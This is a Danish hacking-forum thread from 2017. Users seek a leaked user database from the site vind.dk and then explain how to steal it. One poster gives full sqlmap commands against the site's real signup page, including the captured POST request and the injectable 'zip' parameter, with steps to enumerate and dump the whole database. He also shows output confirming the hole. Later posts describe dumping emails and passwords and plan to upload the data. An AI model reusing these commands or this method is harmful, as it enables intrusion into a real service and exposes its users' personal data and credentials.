Denne side bruger cookies
Dette forum bruger cookies. Hvis du er registreret, bruges de til at huske hvem du er logget ind som. Hvis ikke, gemmer vi dit sidste besøgstidspunkt. Besøgstidspunktet bruges bl.a. til at holde øje med, hvilke tråde du allerede har læst. Cookies er små tekstdokumenter, som bliver gemt i din browser og udgør ingen sikkerhedsrisiko. Tryk "Mere Information" nedenfor, for en liste over de cookies vi sætter. Du har mulighed for at fravælge cookies ved at klikke på knappen "Blokér Cookies" i bunden af denne boks.

En ikke-personhenførbar cookie vil blive gemt i din browser, uanset dit valg (Medmindre du ikke foretager et). Således undgår du at blive spurgt igen. Du kan til enhver tid ændre dit valg via linket i bunden af siden.

Tråd bedømmelse:
  • 0 Stemmer - 0 Gennemsnit
  • 1
  • 2
  • 3
  • 4
  • 5
vind.dk er hacket?
04-07-2017, 09:38
#1
vind.dk er hacket?
Hey
Jeg har hørt at vind.dk er hacket via SQLi og at databasen med over 1000 brugere med mail og kode i klar tekst er lækket et sted. Men jeg kan ikke finde den.
Nogen der har hørt noget, eller har set hvor den ligger?
Find alle beskeder fra denne bruger
Citer denne besked i et svar
04-07-2017, 10:18
#2
RE: vind.dk er hacket?
nu ved jeg ikke om du går efter noget specifikt.. men der er store danske sider som er hacket, nogle af brugerne herinde ligger inde med hundredetusindevis af danske mail+pw i klartekst.
how the
Find alle beskeder fra denne bruger
Citer denne besked i et svar
05-07-2017, 01:53
#3
RE: vind.dk er hacket?
Du kan selv tage databasen eller eventuelt få nogen til det.

http://www.vind.dk/Den_Store_RejseQuiz/V...signup.asp
Der er Blind SQLi på POST input email
Find alle beskeder fra denne bruger
Citer denne besked i et svar
05-07-2017, 13:03 (Denne besked var sidst ændret: 09-07-2017, 15:56 af TheHacker.)
#4
RE: vind.dk er hacket?
OPS!
Dette er kun fremgangsmåden!
Jeg anbefaler ALDRIG at prøve selv, medmindre du er 100% sikker på, at du har en bulletproof server


(05-07-2017, 01:53)Kopa Skrev: Du kan selv tage databasen eller eventuelt få nogen til det.

http://www.vind.dk/Den_Store_RejseQuiz/V...signup.asp
Der er Blind SQLi på POST input email

Mener du ikke på postnummeret?

Nå, send mig en PB.

Jeg har databasen, Niklas.

Så kan jeg evt. også vise dig, hvordan du gør.

Efter jeg modtog en PB, forklarede jeg godt og grundigt, hvordan jeg gjorde.
Her er min metode:
Tricket er, at have SQLmap også køre følgende kommando:

sqlmap -u "http://www.vind.dk/Den_Store_RejseQuiz/Vind-et-rejsegavekort-til-SolOgStrand/signup.asp" --data="action=Submit&questionID=297&answer=3&firstname=test&lastname=test&zip=test&gender=male&birthyear=1999&email=test%40test.dk&x=159&y=47&permission_accept=Permission+accepted" -p "zip" --dbs --threads 6

Kode:
-u "http://www.vind.dk/Den_Store_RejseQuiz/Vind-et-rejsegavekort-til-SolOgStrand/signup.asp"
sørger for, at den ved, hvilken side det er på.

Kode:
--data="action=Submit&questionID=297&answer=3&firstname=test&lastname=test&zip=test&gender=male&birthyear=1999&email=test%40test.dk&x=159&y=47&permission_accept=Permission+accepted"
gør at den ved, hvad den skal skrive i de forskellige felter. I mit tilfælde har jeg bare skrevet noget tilfældigt ind og herefter captured det med burp suite.
En normal burp suite intercept request (bare en html request) ser sådan her ud:

Kode:
POST /Den_Store_RejseQuiz/Vind-et-rejsegavekort-til-SolOgStrand/signup.asp HTTP/1.1
Host: www.vind.dk
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:54.0) Gecko/20100101 Firefox/54.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: da,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 172
Referer: http://www.vind.dk/Den_Store_RejseQuiz/Vind-et-rejsegavekort-til-SolOgStrand/signup.asp
Cookie: rejsequizRegler=XXXXXXX
DNT: 1
Connection: keep-alive
Upgrade-Insecure-Requests: 1

action=Submit&questionID=297&answer=3&firstname=test&lastname=test&zip=test&gender=male&birthyear=1999&email=test%40test.dk&x=159&y=47&permission_accept=Permission+accepted


Kode:
 -p "zip"
dette gør, at den sætter "zip" til target. Zip vulnerable overfor SQL injection.
Kode:
 --dbs --threads 10
dette gør at den kigger efter alle de databaser der findes. --threads 10 gør, at den gør det så hurtigt den kan.
Hvis vi nu vil grave ind i en database, så kan vi gøre det på denne måde:
Kode:
sqlmap -u "http://www.vind.dk/Den_Store_RejseQuiz/Vind-et-rejsegavekort-til-SolOgStrand/signup.asp" --data="action=Submit&questionID=297&answer=3&firstname=test&lastname=test&zip=test&gender=male&birthyear=1999&email=test%40test.dk&x=159&y=47&permission_accept=Permission+accepted" -p "zip" -D vinddk --tables
Læg mærke til, at jeg har sat en -D på (der vælger databasen) og --tables der siger, at den skal vise alle tables i den database.

Vælger jeg nu, at jeg gerne vil hente hele databasen ned (ikke kun en tabel, men HELE databasen), så skriver jeg:
Kode:
sqlmap -u "http://www.vind.dk/Den_Store_RejseQuiz/Vind-et-rejsegavekort-til-SolOgStrand/signup.asp" --data="action=Submit&questionID=297&answer=3&firstname=test&lastname=test&zip=test&gender=male&birthyear=1999&email=test%40test.dk&x=159&y=47&permission_accept=Permission+accepted" -p "zip" --dump --threads 10
Denne gør, at det kun er databasen "vinddk"
Kode:
sqlmap -u "http://www.vind.dk/Den_Store_RejseQuiz/Vind-et-rejsegavekort-til-SolOgStrand/signup.asp" --data="action=Submit&questionID=297&answer=3&firstname=test&lastname=test&zip=test&gender=male&birthyear=1999&email=test%40test.dk&x=159&y=47&permission_accept=Permission+accepted" -p "zip" --tables -D vinddk --dump --threads 10

Du kan google dig frem til flere sqlmap tutorials på nettet :) eller blot spørge her. Det tog lidt længere tid end forventet at svare. Jeg håber du kunne bruge mit svar.

 - TheHacker
Kontakt mig, hvis du har brug for hjælp til noget! Wink
Find alle beskeder fra denne bruger
Citer denne besked i et svar
06-07-2017, 11:17 (Denne besked var sidst ændret: 06-07-2017, 11:27 af TheHacker.)
#5
RE: vind.dk er hacket?
Hvilken kommando kører du?


Kode:
it looks like the back-end DBMS is 'MySQL'. Do you want to skip test payloads specific for other DBMSes? [Y/n] y
for the remaining tests, do you want to include all tests for 'MySQL' extending provided level (1) and risk (1) values? [Y/n] n
sqlmap got a 302 redirect to 'http://www.vind.dk:80/verdo-paaske/index_rq.asp?s2id=41'. Do you want to follow? [Y/n] n
POST parameter 'zip' is vulnerable. Do you want to keep testing the others (if any)? [y/N] n


Det er dem, jeg skrev ind^^

Ellers formindsk "--threads"
Kontakt mig, hvis du har brug for hjælp til noget! Wink
Find alle beskeder fra denne bruger
Citer denne besked i et svar
06-07-2017, 12:00
#6
RE: vind.dk er hacket?
Perfekt :)
De har meget chunk... men en masse emails med adresser.
De har vist også nogle koder.
Kontakt mig, hvis du har brug for hjælp til noget! Wink
Find alle beskeder fra denne bruger
Citer denne besked i et svar
06-07-2017, 12:18
#7
RE: vind.dk er hacket?
(06-07-2017, 12:02)BKK187 Skrev: Jeg laver en dump-all så kan jeg lige uploade den når den færdig engang.

Held og lykke.
Den kommer nok til at køre... i lidt tid.
Kontakt mig, hvis du har brug for hjælp til noget! Wink
Find alle beskeder fra denne bruger
Citer denne besked i et svar
« Ældre | Nyere »




User(s) browsing this thread: 1 Gæst(er)